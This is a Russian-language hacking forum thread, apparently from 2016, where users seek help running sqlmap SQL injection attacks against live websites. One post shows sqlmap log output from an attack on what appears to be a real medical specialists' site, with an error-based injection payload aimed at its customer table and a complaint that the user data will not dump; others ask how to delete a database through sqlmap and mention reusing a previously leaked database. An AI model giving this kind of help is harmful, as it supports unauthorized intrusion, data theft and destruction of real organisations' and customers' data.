 |
|
20.10.2016, 12:40
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
|
|
|
20.10.2016, 12:43
|
|
Новичок
Регистрация: 18.10.2016
Сообщений: 5
С нами:
5036726
Репутация:
0
|
|
Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"
|
|
|
|
20.10.2016, 12:57
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от Metal0l
↑
Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"
софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу
я это к тому что не надо верить софту на слово
|
|
|
|
20.10.2016, 13:18
|
|
Новичок
Регистрация: 18.10.2016
Сообщений: 5
С нами:
5036726
Репутация:
0
|
|
Сообщение от t0ma5
↑
софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу
я это к тому что не надо верить софту на слово
Ахах, что ж ну восьмерка есть восьмерка. Большое спасибо за помощь, буду искать дальше.
|
|
|
|
21.10.2016, 00:01
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
web application technology: Apache
back-end DBMS: MySQL >= 4.1
[22:03:31] [INFO] fetching columns for table 'cust' in database 'medical-special
ists-n'
[22:03:31] [INFO] the SQL query used returns 36 entries
[22:03:31] [DEBUG] suppressing possible resume console info because of large num
ber of rows. It might take too long
[22:03:31] [INFO] starting 10 threads
[22:03:31] [DEBUG] performed 0 queries in 0.23 seconds
[22:03:31] [INFO] fetching entries for table 'cust' in database 'medical-special
ists-n'
[22:03:31] [PAYLOAD] ' OR ROW(9489,9175)>(SELECT COUNT(*),CONCAT(0x716b706271,(S
ELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM `medical-specialists-n`.cust),0x7
176786b71,FLOOR(RAND(0)*2))x FROM (SELECT 2961 UNION SELECT 8568 UNION SELECT 54
10 UNION SELECT 8661)a GROUP BY x)-- NCpp
[22:03:31] [WARNING] the SQL query provided does not return any output
[22:03:31] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[22:03:31] [WARNING] unable to retrieve the entries for table 'cust' in database
Не могу сдампить пользователей,таблицы показывает,колонки тоже.А вот не дампит(((
|
|
|
|
23.10.2016, 14:21
|
|
Новичок
Регистрация: 17.09.2016
Сообщений: 6
С нами:
5081366
Репутация:
0
|
|
Привет всем!
Ребята, а можно как-то делитнуть базу через SQLmap?
|
|
|
|
23.10.2016, 15:02
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
Сообщение от masterdolicjakov
↑
Привет всем!
Ребята, а можно как-то делитнуть базу через SQLmap?
--start=10 --stop=20
|
|
|
|
24.10.2016, 13:07
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от masterdolicjakov
делитнуть ведь от слова delete? если да, то start/stop тут не причет, это лимиты для запроса
для удаления записей базы у mysql юзера должны быть соответствующие права, + если select и delete в одном запросе всё равно делать нельзя, это если скуль в select
|
|
|
|
29.10.2016, 04:04
|
|
Новичок
Регистрация: 29.07.2015
Сообщений: 25
С нами:
5680406
Репутация:
0
|
|
всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?
|
|
|
|
29.10.2016, 16:06
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от Bobrenz
↑
всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?
мануал читать
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
